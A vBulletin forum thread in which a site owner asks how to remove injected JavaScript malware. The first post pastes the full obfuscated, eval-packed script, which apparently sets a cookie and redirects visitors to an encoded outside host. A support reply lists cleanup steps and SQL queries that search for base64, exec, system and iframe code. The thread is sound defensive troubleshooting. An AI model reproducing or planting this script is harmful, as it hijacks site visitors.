How to Get rid of this Malware?

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • Neutral Singh
    Senior Member
    • Sep 2004
    • 232
    • 3.8.x
    #1

    How to Get rid of this Malware?

    Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JSEPACK
    <html><head></head><body><script type="text/javascript">var ipbs='ad5fab0b';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i a=["\\r\\d\\c\\k\\b\\y\\d","\\m\\d\\c\\k\\b\\y\\d","\\x\\z\\d\\M\\g\\b\\l\\d\\m\\j","\\c\\e\\ K\\I\\k\\D\\c\\l\\b\\n\\r","\\v\\e\\e\\F\\b\\d","\\j","\\x\\z\\g\\w\\c\\p\\j\\f","\\b\\g\\ C\\m","\\t","\\q\\e\\v\\w\\c\\b\\e\\n","\\p\\c\\c\\g\\E\\f\\f\\G\\l\\q\\t\\S\\H\\P\\b\\n\\ R\\e\\f"];O s(A,o){i h=N J();h[a[1]](h[a[0]]()+L);i u=a[2]+h[a[3]]();B[a[4]]=A+a[5]+o+u+a[6]};s(a[7],a[8]);B[a[9]]=a[T]+Q;',56,56,'||||||||||_0x12bb|x69|x74|x65|x6F|x2F|x70|_0x102ex4|var|x3D|x54|x72|x73|x6E|_0 x102ex3|x68|x6C|x67|ipbcc|x31|_0x102ex5|x63|x61|x3B|x6D|x20|_0x102ex2|document|x62|x53|x3A |x6B|x75|x33|x4D|Date|x47|86400000|x78|new|function|x2E|ipbs|x66|x32|10'.split('|'),0,{})) </script></body></html
    Is there any tool which tell us which script being triggered whenever someone clicks on my website link in a search engine? I have read a few threads but nobody has finally proclaimed that the issue has been resolved. I have upgraded to the latest in vb3 series + vbSEO is also up-to-date. If i am asked to look into the plugins then what should i look for in the plugins?

    How to get rid of this malware?

    Thanks

    Tags: None
    • stevectaylor
      Senior Member
      • Aug 2007
      • 380
      • 3.6.x
      #2
      We got this one also!
      Holiday Forum
      Motor Car Forum
      Political Forum
      Web Hosting Forum

        Comment

        • Trevor Hannant
          vBulletin Support
          • Aug 2002
          • 24358
          • 5.7.X
          #3
          To check a site for compromises follow these steps:

          1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

          2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

          3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

          4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

          5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

          6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

          The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
          SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

          If you a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

          7) Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

          It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

          8) Check .htaccess to make sure there are no redirects there.

          9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
          Vote for:

          - Admin Settable Paid Subscription Reminder Timeframe (vB6)
          - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

            Comment

            Previous template Next
            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
            Working...